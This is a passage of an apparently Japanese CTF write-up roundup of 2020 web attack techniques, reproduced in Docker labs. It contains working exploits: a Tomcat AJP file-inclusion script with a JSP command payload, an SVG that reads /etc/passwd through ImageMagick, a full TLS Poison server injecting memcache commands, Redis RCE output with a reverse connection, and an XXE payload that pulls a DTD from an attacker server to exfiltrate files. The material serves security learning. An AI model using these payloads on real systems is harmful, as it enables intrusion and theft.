HTTPトンネルを張るツールとしてreGeorgがありますが、 こちらはターゲットのWebサーバーにjspやphpファイルなどを何らかの方法でアップロードして、そこを入り口とする前提でした。 Pythonやflaskには対応していません。
WMCTF 2020のLogin me again and againという問題では、 flaskのSSTI脆弱性で任意のコードを実行できる前提で、 その場でflaskに新しくルートを追加し、reGeorgから接続可能なHTTPトンネルの入り口を設ける手法が使われました。 (jspやphpファイルのアップロードとは違い、ファイルシステム上には痕跡が残らないので、実際の攻撃に使われた場合に検知や調査が困難ですね・・・)
ちなみに、reGeorgをリファクタリングおよび機能追加しているNeo-reGeorgというツールもあります。
https://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md
- writeup
- WMCTF 2020 - Login me again and again
https://github.com/wm-team/WMCTF2020-WriteUp/blob/master/WMCTF%202020%E5%AE%98%E6%96%B9WriteUp.md#login_me_again_and_again
MarkDown版のWriteupでは画像が表示されませんが、PDF版のWriteupで確認できます。
- WMCTF 2020 - Login me again and again
Local/Remote File Inclusion
TomcatのAJPコネクタにAJPリクエストを送信してLFI
Tomcatには、Apache HTTP Server等と連携するために、AJP(Apache JServ Protocol)で通信可能なAJPコネクタという機能があります。
CVE-2020-1938の脆弱性を使用したり、何らかの理由でAJPポートに直接アクセスしたい場合などのために、
AJPリクエストを送信するツールが公開されています。
https://github.com/hypn0s/AJPy
CVE-2020-1938はLFIの脆弱性ですが、以下の記事が参考になります。
https://www.jpcert.or.jp/at/2020/at200009.html
https://blog.trendmicro.co.jp/archives/24748
なお、Tomcatのバージョン8.5.51
から、デフォルト設定でAJPポートは公開しない設定になりました。
実際に試してみましょう。
まずはターゲットとなる環境とアプリを構築します。
こちらがファイル構成です。
./ ├── Dockerfile └── webapps └── demo ├── cmd.txt └── WEB-INF └── web.xml
CVE-2020-1938の脆弱性は8.5.51
で修正されているため、それより前である8.5.50
を使用するコンテナイメージを使用します。
Dockerfile
FROM tomcat:8.5.50-jdk11-adoptopenjdk-hotspot COPY conf/ /usr/local/tomcat/conf/ COPY webapps/ /usr/local/tomcat/webapps/
LFIでコード実行するために、実行したいコードをJSPで記載したファイルをコンテキスト内に配備しておきます。CTFの問題では、アップロード機能で配備しますが、検証を簡略化するためあらかじめ配備しておきます。
webapps/demo/cmd.txt
<% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("id").getInputStream())).readLine()); %>
コンテナをビルドして起動します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp# docker build --no-cache -t tomcat-ajp-demo . Sending build context to Docker daemon 238.6kB Step 1/3 : FROM tomcat:8.5.50-jdk11-adoptopenjdk-hotspot ---> a34c1f77edf9 Step 2/3 : COPY conf/ /usr/local/tomcat/conf/ ---> dbdc19274adf Step 3/3 : COPY webapps/ /usr/local/tomcat/webapps/ ---> f236312ecd76 Successfully built f236312ecd76 Successfully tagged tomcat-ajp-demo:latest root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp# docker run --rm -p 8009:8009 --name tomcat-ajp-demo tomcat-ajp-demo (snip) 09-Aug-2021 00:24:56.665 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["http-nio-8080"] 09-Aug-2021 00:24:56.681 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["ajp-nio-0.0.0.0-8009"] 09-Aug-2021 00:24:56.687 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 434 ms
次にAJPyのリポジトリを取得します。
試しにCVE-2020-1938のPoCであるread_file
機能を使用すると、コンテキスト内のWEB-INF/web.xml
を取得できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp# git clone https://github.com/hypn0s/AJPy.git root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp# cd AJPy root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp/AJPy# python3 tomcat.py read_file --webapp=demo /WEB-INF/web.xml localhost <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" version="3.1"> <servlet> <servlet-name>SimpleServlet</servlet-name> <servlet-class>demo.SimpleServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>SimpleServlet</servlet-name> <url-pattern>/SimpleServlet</url-pattern> </servlet-mapping> </web-app>
次に、writeupを参考にして、LFIでcmd.txt
をインクルードして実行するexploitコードを準備します。
importしているtomcat
は、AJPyのモジュールです。
exploit.py
import sys from tomcat import Tomcat tc = Tomcat("localhost", 8009) shell_path = "cmd.txt" attributes = [ {"name": "req_attribute", "value": ("javax.servlet.include.request_uri", "/",)}, {"name": "req_attribute", "value": ("javax.servlet.include.path_info", shell_path,)}, {"name": "req_attribute", "value": ("javax.servlet.include.servlet_path", "/",)}, ] hdrs, data = tc.perform_request("/demo/dummy.jsp", attributes=attributes) output = sys.stdout for d in data: try: output.write(d.data.decode('utf8')) except UnicodeDecodeError: output.write(repr(d.data))
exploitコードを実行するとcmd.txt
に記載したJSPコードを実行し、id
コマンドが実行されたことを確認できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-ajp/AJPy# python3 exploit.py Getting resource at ajp13://localhost:8009/demo/dummy.jsp uid=0(root) gid=0(root) groups=0(root)
- writeup
- SCTF-XCTF 2020 - Login Me Aagin
https://ctftime.org/writeup/22158
- SCTF-XCTF 2020 - Login Me Aagin
ImageMagickにtext属性を使用したSVGファイルを変換させてLFI
ImageMagickに任意のファイルを渡せる場合に、 text属性を使用して任意のファイルパスへの参照を定義したSVGファイルを作成して渡すことで、 生成された画像ファイルにそのファイル内容が画像として埋め込まれ、LFIできる手法です。
以下の記事のShort intermission - reading local filesが参考になります。
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
実際に試してみましょう。
DockerでImageMagickをインストールしたコンテナを生成します。
Dockerfile
FROM ubuntu:18.04 RUN apt-get update -y \ && apt-get install -y imagemagick
/etc/passwd
ファイルを参照するSVGファイルを作成します。
test.svg
<svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="text:/etc/passwd" height="500" width="500"/> </svg>
コンテナ内でconvertコマンドを実行します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/imagemagick# docker build . --tag imagemagick:6.9 (snip) root@kali:/mnt/hgfs/CTF/Writeup/2020/imagemagick# docker run -it --rm -v /mnt/hgfs/CTF/Writeup/2020/imagemagick/:/img --name im6.9 imagemagick:6.9 /bin/bash root@6c46edbc9d9c:/# cd /img/ root@6c46edbc9d9c:/img# convert -version Version: ImageMagick 6.9.7-4 Q16 x86_64 20170114 http://www.imagemagick.org Copyright: © 1999-2017 ImageMagick Studio LLC License: http://www.imagemagick.org/script/license.php Features: Cipher DPC Modules OpenMP Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff wmf x xml zlib root@6c46edbc9d9c:/img# convert test.svg passwd.png
生成されたpasswd.pngがこちらです。確かに/etc/passwdの内容が画像として埋め込まれています。
- writeup
- 0CTF/TCTF 2020 Quals - Wechat Generator
https://github.com/hyperreality/ctf-writeups/blob/master/2020_tctf/README.md
- 0CTF/TCTF 2020 Quals - Wechat Generator
Zabbixの管理画面から監視対象サーバー内の任意のファイルを取得
Zabbixの管理画面にログインできる場合に、Zabbixエージェントがインストールされている監視対象のサーバー内の任意のファイルを取得する手法です。
itemを作成してから、Key項目に以下のような形式でファイルパスを指定すると、ファイルの内容を取得できます。
vfs.file.contents[/etc/passwd]
以下のマニュアルにも記載されています。
https://www.zabbix.com/documentation/current/manual/config/items/itemtypes/zabbix_agent
- writeup
- N1CTF 2020 - zabbix_fun
https://www.gem-love.com/ctf/2657.html#webzabbixfun
- N1CTF 2020 - zabbix_fun
Directory Traversal
Pythonのos.path.join関数の仕様を利用したディレクトリトラバーサル
Pythonのos.path.join
は、パラメータを連結してファイルパスを作成する関数ですが、
第2パラメータ以降に/
から始まる絶対パスを指定すると、
それ以前のパラメータが結合されない仕様になっています。
マニュアルにも記載されています。
https://docs.python.org/ja/3/library/os.path.html#os.path.join
よって、ユーザーからの入力パラメータをそのままos.path.join
に渡してファイルパスを生成していると、
ディレクトリトラバーサルの脆弱性の発生に繋がる場合があります。
実際に試してみましょう。
>>> import os >>> os.path.join("aaa", "bbb") 'aaa/bbb' >>> os.path.join("aaa", "/bbb") '/bbb' # aaaが結合対象から無くなっている >>> os.path.join("aaa", "bbb", "/ccc") '/ccc' # aaaとbbbが結合対象から無くなっている >>> os.path.join("aaa", "/bbb", "ccc") '/bbb/ccc' # 以降は結合対象のまま
- writeup
- UIUCTF 2020 - security_question
https://github.com/ranguli/writeups/blob/master/uiuctf/2020/security_question.md
- UIUCTF 2020 - security_question
Server-Side Request Forgery(SSRF)
FTPのPASVモードを使用した任意ポートへのバイナリデータ送信
PHPのfile_put_contents
関数で、任意のパスに任意のデータを書き込み可能な場合に、
PHPのftp://
URLラッパーがFTPサーバーへパッシブモードで接続することを利用し、
用意したFTPサーバー側でデータコネクションのポートをターゲットのポートに指定することで、
そのポートに対してデータを送信する手法です。
目的のデータ送信先がHTTPプロトコルやローカルファイルであれば、
直接、file_put_contents
関数のパスに指定すればよいのですが、
バイナリデータの送信が必要な場合に利用できます。
hxp CTF 2020のresonatorという問題では、
open_basedir
の制限をバイパスするために、
PHP-FPMのTCPソケットのポートに、バイナリデータを送信するために使用していました。
実際に試してみましょう。
理解のために、writeupのコードをそのまま使用するのではなく、ncコマンドで試してみます。 上がクライアント、左下がFTPサーバー、右下がターゲットとなる送信先ポートです。
FTPのPASVモードを使用した任意ポートへのバイナリデータ送信(ブログ貼り付け用) pic.twitter.com/lzhUVqHWVw
— graneed (@graneed111) 2021年8月9日
- writeup
- hxp CTF 2020 - resonator
https://github.com/dfyz/ctf-writeups/tree/master/hxp-2020/resonator
- hxp CTF 2020 - resonator
TLS Poisonによるローカルのmemcacheへデータ登録
Blackhat USA 2020でTLS Poisonという攻撃手法が発表されました。
この手法を使用すると、攻撃者が用意するサーバーに通信を誘導可能、且つその攻撃者のサーバーへの通信が2回発生する場合に、2回目の通信でネットワーク内の別のサーバー(localhost含む)に対して、TLSのセッションID領域を使用して任意のデータを送ることができます。
https://github.com/jmdx/TLS-poison
これには、TLS通信における以下の仕様や挙動を利用します。
- TLS通信の接続の際、サーバーからクライアントにTLSのセッションIDを払い出すこと
- 再接続の際に、TLSのハンドシェイク処理を軽減するためにTLSのセッションIDをサーバーに送ること
- 一部のクライアントは、TLSのセッションIDを送るかどうかを接続先のホストとポートで判断すること
- 再接続先のサーバーが停止していた場合、Aレコードに登録されている別のIPアドレスに再接続すること
準備するものはこちらです。
hxp CTF 2020のsecurity scannerという問題では、サーバーのローカルでmemcacheが起動されていて、(詳細は省略しますが)RCEを取得するためにmemcacheにデータを登録する必要がありました。 また、外部からgitクライアントの通信先を指定できる機能がありました。 そこで、gitクライアントに攻撃者のTLSサーバーに通信させるよう指定し、この手法を使用することで、ネットワーク内のmemcacheにデータを登録させることができます。
一部簡易化した環境を構築して実際に試してみましょう。
ターゲットのサーバーにmemcacheサーバーを立てます。Dockerを使用します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/TLS-poison# docker run --rm --name memcache -p 11211:11211 memcached
攻撃者のドメインを準備します。
DNSのAレコードを追加し、TLSサーバーのIPアドレスと0.0.0.0
を登録します。
登録してからdigコマンドで確認すると以下のようになります。
root@kali:/mnt/hgfs/CTF/Writeup/2020/TLS-poison# dig fakegit.REDACTED ; <<>> DiG 9.16.2-Debian <<>> fakegit.REDACTED ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8356 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 1232 ;; QUESTION SECTION: ;fakegit.REDACTED. IN A ;; ANSWER SECTION: fakegit.REDACTED. 5 IN A 0.0.0.0 fakegit.REDACTED. 5 IN A [TLSサーバーのIPアドレス] ;; Query time: 75 msec ;; SERVER: 192.168.79.2#53(192.168.79.2) ;; WHEN: Tue Aug 03 10:21:24 JST 2021 ;; MSG SIZE rcvd: 80
攻撃者のTLSサーバーを用意します。 hxp CTF 2020のsecurity scannerのwriteupで公開されていたfake_git.pyを改造して、手法の検証に関係ないところを削除して簡易化しています。
fake_git_custom.py
root@ip-172-31-6-71:~/security scanner# cat fake_git_custom.py import argparse import base64 import hashlib import hmac import re import socket import struct import time from Crypto.Cipher import AES from Crypto.PublicKey import RSA from dataclasses import dataclass from pathlib import Path # RFC 5246, section 5 def prf(secret, label, seed, length): def hmac_sha256(key, msg): return hmac.digest(key, msg, hashlib.sha256) seed = label + seed result = b'' cur_a = seed while len(result) < length: cur_a = hmac_sha256(secret, cur_a) result += hmac_sha256(secret, cur_a + seed) return result[:length] def to_ad(seq_num, tls_type, tls_version, tls_len): return struct.pack('>QBHH', seq_num, tls_type, tls_version, tls_len) # Chosen by fair dice roll, guaranteed to be random. def get_random_bytes(length): return b'A' * length class TLS: # in bytes (i.e., this is 4096 bits) KEY_LENGTH = 512 PKCS_PREFIX = b'\x00\x02' # TLS 1.2 VERSION = 0x0303 # TLS_RSA_WITH_AES_128_GCM_SHA256, because we don't care to support the full DH exchange. CIPHER_SUITE = 0x9c CHANGE_CIPHER_SPEC_CONTENT_TYPE = 0x14 ALERT_CONTENT_TYPE = 0x15 HANDSHAKE_CONTENT_TYPE = 0x16 DATA_CONTENT_TYPE = 0x17 FINISHED_HANDSHAKE_TYPE = 0x14 @dataclass class Record: content_type: int version: int data: bytes @dataclass class HandshakeRecord: handshake_type: int data: bytes @dataclass class SessionKeys: master_secret: bytes client_key: bytes server_key: bytes client_salt: bytes server_salt: bytes def __init__(self, socket, priv_key, certs, session_id): self.socket = socket self.priv_key = priv_key self.certs = certs # Chosen by a fair dice roll. self.server_random = get_random_bytes(32) self.session_id = session_id self.client_seq_num = 0 self.server_seq_num = 0 self.handshake_log = b'' self.session_keys = None self._shake_hands() def _read_record(self, expected_type): header = self.socket.recv(5) content_type, version, length = struct.unpack('>BHH', header) data = self.socket.recv(length) assert content_type == expected_type, f'Bad content type: got {content_type}, expected {expected_type}' return TLS.Record(content_type, version, data) def _write_record(self, record): payload = struct.pack('>BHH', record.content_type, record.version, len(record.data)) + record.data self.socket.send(payload) def _read_handshake_record(self, expected_type, decrypt=False): record = self._read_record(TLS.HANDSHAKE_CONTENT_TYPE) payload = record.data if decrypt: payload = self._decrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE, record.version) self.handshake_log += payload header_size = 4 header, *_ = struct.unpack('>I', payload[:header_size]) handshake_type = header >> 24 assert handshake_type == expected_type, f'Bad handshake type: got {handshake_type}, expected {expected_type}' length = header & 0xFF_FF_FF return TLS.HandshakeRecord(handshake_type, payload[header_size:header_size + length]) def _write_handshake_record(self, record, encrypt=False): header = (record.handshake_type << 24) | len(record.data) payload = struct.pack('>I', header) + record.data if encrypt: payload = self._encrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE) self.handshake_log += payload self._write_record(TLS.Record(TLS.HANDSHAKE_CONTENT_TYPE, TLS.VERSION, payload)) def _get_server_hello(self): return b''.join([ struct.pack('>H', TLS.VERSION), self.server_random, struct.pack('B', len(self.session_id)), self.session_id, # No compression, no extensions. struct.pack('>HBH', TLS.CIPHER_SUITE, 0, 0), ]) def _get_certificate(self): def int16_to_int24_bytes(x): return b'\x00' + struct.pack('>H', x) packed_certs = b''.join([ int16_to_int24_bytes(len(cert)) + cert for cert in self.certs ]) return int16_to_int24_bytes(len(packed_certs)) + packed_certs def derive_keys(self, encrypted_premaster_secret, client_random): assert len(encrypted_premaster_secret) == TLS.KEY_LENGTH encrypted_premaster_secret = int.from_bytes(encrypted_premaster_secret, byteorder='big') premaster_secret = pow(encrypted_premaster_secret, self.priv_key.d, self.priv_key.n).to_bytes(TLS.KEY_LENGTH, byteorder='big') assert premaster_secret.startswith(TLS.PKCS_PREFIX) premaster_secret = premaster_secret[premaster_secret.find(b'\x00', len(TLS.PKCS_PREFIX)) + 1:] assert len(premaster_secret) == 48 master_secret = prf(premaster_secret, b'master secret', client_random + self.server_random, 48) enc_key_length, fixed_iv_length = 16, 4 expanded_key_length = 2 * (enc_key_length + fixed_iv_length) key_block = prf(master_secret, b'key expansion', self.server_random + client_random, expanded_key_length) return TLS.SessionKeys( master_secret=master_secret, client_key=key_block[:enc_key_length], server_key=key_block[enc_key_length:2 * enc_key_length], client_salt=key_block[2 * enc_key_length:2 * enc_key_length + fixed_iv_length], server_salt=key_block[2 * enc_key_length + fixed_iv_length:], ) def _get_server_finished(self): session_hash = hashlib.sha256(self.handshake_log).digest() return prf(self.session_keys.master_secret, b'server finished', session_hash, 12) def _encrypt(self, data, tls_type): explicit_nonce = get_random_bytes(8) cipher = AES.new(self.session_keys.server_key, AES.MODE_GCM, nonce=self.session_keys.server_salt + explicit_nonce) cipher.update(to_ad(self.server_seq_num, tls_type, TLS.VERSION, len(data))) ciphertext, tag = cipher.encrypt_and_digest(data) self.server_seq_num += 1 return explicit_nonce + ciphertext + tag def _decrypt(self, data, tls_type, tls_version): cipher = AES.new(self.session_keys.client_key, AES.MODE_GCM, nonce=self.session_keys.client_salt + data[:8]) ciphertext = data[8:-16] tag = data[-16:] cipher.update(to_ad(self.client_seq_num, tls_type, tls_version, len(ciphertext))) self.client_seq_num += 1 return cipher.decrypt_and_verify(ciphertext, tag) def read(self): record = self._read_record(TLS.DATA_CONTENT_TYPE) payload = self._decrypt(record.data, TLS.DATA_CONTENT_TYPE, record.version) print(f'Got a message of length {len(payload)}') return payload def write(self, msg): payload = self._encrypt(msg, TLS.DATA_CONTENT_TYPE) self._write_record(TLS.Record(TLS.DATA_CONTENT_TYPE, TLS.VERSION, payload)) print(f'Sent a message of length {len(payload)}') def _shake_hands(self): client_hello = self._read_handshake_record(0x1).data client_random = client_hello[2:2 + 32] print(f'Got client hello') self._write_handshake_record(TLS.HandshakeRecord(0x2, self._get_server_hello())) print(f'Sent server hello with session id {self.session_id}') self._write_handshake_record(TLS.HandshakeRecord(0xb, self._get_certificate())) print(f'Sent {len(self.certs)} certificates') self._write_handshake_record(TLS.HandshakeRecord(0xe, b'')) print(f'Sent server hello done') # Skip the redundant premaster secret length. encrypted_premaster_secret = self._read_handshake_record(0x10).data[2:] print(f'Got a premaster secret') self.session_keys = self.derive_keys(encrypted_premaster_secret, client_random) self._read_record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE) client_finished = self._read_handshake_record(TLS.FINISHED_HANDSHAKE_TYPE, decrypt=True) print(f'Got client finished') self._write_record(TLS.Record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE, TLS.VERSION, b'\x01')) server_finished = TLS.HandshakeRecord(TLS.FINISHED_HANDSHAKE_TYPE, self._get_server_finished()) self._write_handshake_record(server_finished, encrypt=True) print(f'Sent server finished, the connection is ready') def get_http_response(code, headers, content): headers.update({ 'Connection': 'close', 'Content-Length': str(len(content)), }) return '\r\n'.join([ f'HTTP/1.1 {code} Whatever', '\r\n'.join([ f'{k}: {v}' for k, v in headers.items() ]), '', content, ]).encode() if __name__ == '__main__': p = argparse.ArgumentParser() p.add_argument('key') p.add_argument('cert') p.add_argument('--port', type=int, default=11211) args = p.parse_args() priv_key = RSA.import_key(Path(args.key).read_text()) certs = [ base64.b64decode(''.join( cert_line for cert_line in cert.splitlines() if not cert_line.startswith('-') )) for cert in Path(args.cert).read_text().split('\n\n') ] while True: server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind(('0.0.0.0', args.port)) server_socket.listen(1) print('Welcome to FakeGIT') should_serve = True session_id = b'\r\nset HOGE 0 0 4\r\nFUGA\r\n' # ここにmemcacheにセットしたいデータを登録 while should_serve: client_socket, address = server_socket.accept() print(f'Got a connection from {address}') tls = TLS(client_socket, priv_key, certs, session_id) http_request = tls.read() assert session_id, 'Session id should have been set at this point' headers = { } tls.write(get_http_response(200, headers, '')) should_serve = False client_socket.close() server_socket.close() print('Laying low for 5 seconds so that the git client doesn\'t reconnect to us') time.sleep(5)
秘密鍵ファイルとサーバー証明書ファイルを生成してから、サーバーを起動します。
# 秘密鍵ファイルとサーバー証明書ファイルを生成 root@ip-172-31-6-71:~/security scanner# openssl genrsa 4096 > server.key Generating RSA private key, 4096 bit long modulus (2 primes) ....................................++++ ........................................................++++ e is 65537 (0x010001) root@ip-172-31-6-71:~/security scanner# openssl req -new -key server.key > server.csr Can't load /root/.rnd into RNG 140193182073280:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/root/.rnd You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []: root@ip-172-31-6-71:~/security scanner# openssl x509 -req -days 3650 -signkey server.key < server.csr > server.crt Signature ok subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd Getting Private key # 起動 root@ip-172-31-6-71:~/security scanner# python3 fake_git_custom.py server.key server.crt Welcome to FakeGIT
準備が整いましたので、ターゲットのサーバーからgitコマンドを実行して試してみます。
# 自己署名証明書を使用しているため、それを許容する設定 root@kali:/mnt/hgfs/CTF/Writeup/2020/TLS-poison# git config --global http.sslVerify false root@kali:/mnt/hgfs/CTF/Writeup/2020/TLS-poison# git ls-remote --tags -- https://fakegit.graneed.net:11211
TLSサーバーの実行ログを見てみます。
root@ip-172-31-6-71:~/security scanner# python3 fake_git_custom.py server.key server.crt Welcome to FakeGIT Got a connection from ('ターゲットのサーバーのIPアドレス', 38229) Got client hello Sent server hello with session id b'\r\nset HOGE 0 0 4\r\nFUGA\r\n' Sent 1 certificates Sent server hello done Got a premaster secret Got client finished Sent server finished, the connection is ready Got a message of length 233 Sent a message of length 87 Laying low for 5 seconds so that the git client doesn't reconnect to us Welcome to FakeGIT
memcacheを確認すると、TLSのセッションIDにセットしていた、キーHOGE
、値FUGA
が登録されていました。
php > var_dump($m->get("HOGE")); string(4) "FUGA"
なお、TLSのセッションIDは32バイトであるため、あまり長いデータは送信できません。
fake_git_custom2.py
(snip) session_id = b'\r\nset HOGE 0 0 12\r\n123456789012\r\n' # 合計33バイトであるためエラーになる (snip)
- writeup
- hxp CTF 2020 - security scanner
https://github.com/dfyz/ctf-writeups/tree/master/hxp-2020/security%20scanner
問題ファイルが公開されています。
https://2020.ctf.link/internal/challenge/5cd5e70e-a2fa-44df-82a1-3a16217c1893/
- hxp CTF 2020 - security scanner
RedisへSSRFして任意のコマンド実行
昨年のまとめでは、RedisのポートにSSRF可能な場合にサーバー内のファイルが取得できる攻撃手法を紹介しましたが、こちらはRCEまでできる手法です。
以下の記事が参考になります。
https://knqyf263.hatenablog.com/entry/2019/07/16/092907
https://medium.com/@knownsec404team/rce-exploits-of-redis-based-on-master-slave-replication-ef7a664ce1d0
簡単に試すことのできるツールも公開されています。
https://github.com/jas502n/Redis-RCE
実際に試してみましょう。
まずは環境構築です。
Dockerfile
FROM redis:5.0.13-alpine
コンテナのビルドと実行をします。
root@kali:/mnt/hgfs/CTF/Writeup/2020/redis-ssrf# docker build --no-cache -t redis-victim . Sending build context to Docker daemon 5.177MB Step 1/1 : FROM redis:5.0.13-alpine (snip) Successfully tagged redis-victim:latest root@kali:/mnt/hgfs/CTF/Writeup/2020/redis-ssrf# docker run --rm -p 6379:6379 --name redis-victim redis-victim 1:C 02 Aug 2021 01:53:25.178 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo 1:C 02 Aug 2021 01:53:25.178 # Redis version=5.0.13, bits=64, commit=00000000, modified=0, pid=1, just started 1:C 02 Aug 2021 01:53:25.178 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf 1:M 02 Aug 2021 01:53:25.181 * Running mode=standalone, port=6379. 1:M 02 Aug 2021 01:53:25.182 # Server initialized 1:M 02 Aug 2021 01:53:25.182 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect. 1:M 02 Aug 2021 01:53:25.182 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled. 1:M 02 Aug 2021 01:53:25.182 * Ready to accept connections
ツールをgithubから取得します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/redis-ssrf# git clone https://github.com/jas502n/Redis-RCE.git Cloning into 'Redis-RCE'... remote: Enumerating objects: 65, done. remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65 Receiving objects: 100% (65/65), 2.32 MiB | 7.47 MiB/s, done. Resolving deltas: 100% (23/23), done. root@kali:/mnt/hgfs/CTF/Writeup/2020/redis-ssrf# cd Redis-RCE/
Redic-RCEを実行すると、攻撃対象のRedisサーバーに接続、マスターサーバーの起動、Redisモジュールの配信をして、攻撃対象のサーバーで任意のコマンドを実行できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/redis-ssrf/Redis-RCE# python redis-rce.py -r localhost -L 172.17.0.1 -f ./exp_lin.so █▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄ █ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀ █▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄ █ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀ █ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀ ▀ ▀ [*] Connecting to localhost:6379... [*] Listening on 172.17.0.1:21000 [*] Sending SLAVEOF command to server [+] Accepted connection from 127.0.0.1:40288 [*] Setting filename [*] Tring to run payload [+] Accepted connection from 172.17.0.1:21000 [*] Closing rogue server... [+] Received backconnect, use exit to exit... $ id uid=999(redis) gid=1000(redis) groups=1000(redis),1000(redis)
- writeup
- CSAW CTF Qualification Round 2020 - WebRTC
https://ctftime.org/task/13011
- CSAW CTF Qualification Round 2020 - WebRTC
Unicode文字を用いたCRLFインジェクションによるRequest Splitting
Nodejs v8.12.0以前のバージョンでは、Unicode文字を使用したCRLFインジェクションができたようで、 それを使用して、1つのHTTPリクエストを2つのHTTPリクエストに分割し、SSRFを発生させる手法です。
以下の記事が参考になります。
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
- writeup
- nullcon HackIM 2020 - split second
https://r3billions.com/writeup-split-second/
- nullcon HackIM 2020 - split second
XML External Entity(XXE)
DTDファイルを使用したCDATAブロックの活用による文字制限の回避
XXE攻撃でサーバー内のファイルを窃取したい場合に、
目的のファイル内に&
、<
、>
などの文字が含まれていると、
XMLデータ内にファイルを挿入後に、XMLとしての構文が崩れてしまって失敗することがあります。
XMLでそのような文字列を取り扱う場合、CDATA
ブロックを使用できますが、
そうすると今度は&
記号がプレーンな文字として扱われてしまい、
目的のファイルをXMLデータ内に挿入する処理が動作せず、目的が達成できません。
そこで、DTDファイルを活用することで、目的のファイルの挿入処理を動作させつつ、
目的したファイルの内容をCDATA
ブロック内に含めることが可能となります。
リクエストデータ
<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://<攻撃者のサーバー>/evil.dtd"> %dtd; %all; ]> <data>&fileContents;</data>
サーバー内に配備するevil.dtd
<!ENTITY % file SYSTEM "file:///目的のファイル"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
以下の記事が参考になります
https://dzone.com/articles/xml-external-entity-xxe-limitations
- writeup
- m0leCon CTF 2020 Teaser - Skygenerator
https://github.com/nreusch/writeups/blob/master/m0lecon_2020/skygenerator.md
- m0leCon CTF 2020 Teaser - Skygenerator
Insecure Deserialization
機能拡張されたysoserialによるWebShellの取得
Javaの安全でないデシリアライゼーションの攻撃に、ysoserialがよく使用されます。
https://github.com/frohoff/ysoserial
ysoserialをforkしてpayloadを追加するなど機能拡張しているリポジトリが公開されています。 特にTomcatにメモリWebShellを設置する機能追加が多く見つかります。 (中国語圏内の記事が多い気がします。)
- Tomcatのセミユニバーサルエコー方式
- グローバルストレージに基づく新しいアイデア|一般的なエコー方式に関するTomcatの調査
- TomcatベースのメモリWebshellファイルレス攻撃テクノロジー
- CommonsBeanutilsとcommons-collectionsを使用しないShiroの逆シリアル化の利用
上記のうち、「TomcatベースのメモリWebshellファイルレス攻撃テクノロジー」のリポジトリのysoserialを使用して、実際に試してみましょう。
まずはターゲットとなる環境とアプリを構築します。
こちらがファイル構成です。
2021年8月時点でcommons-collectionsの最新版は3.2.2
でしたが、脆弱性が修正されているため、検証には3.2.1
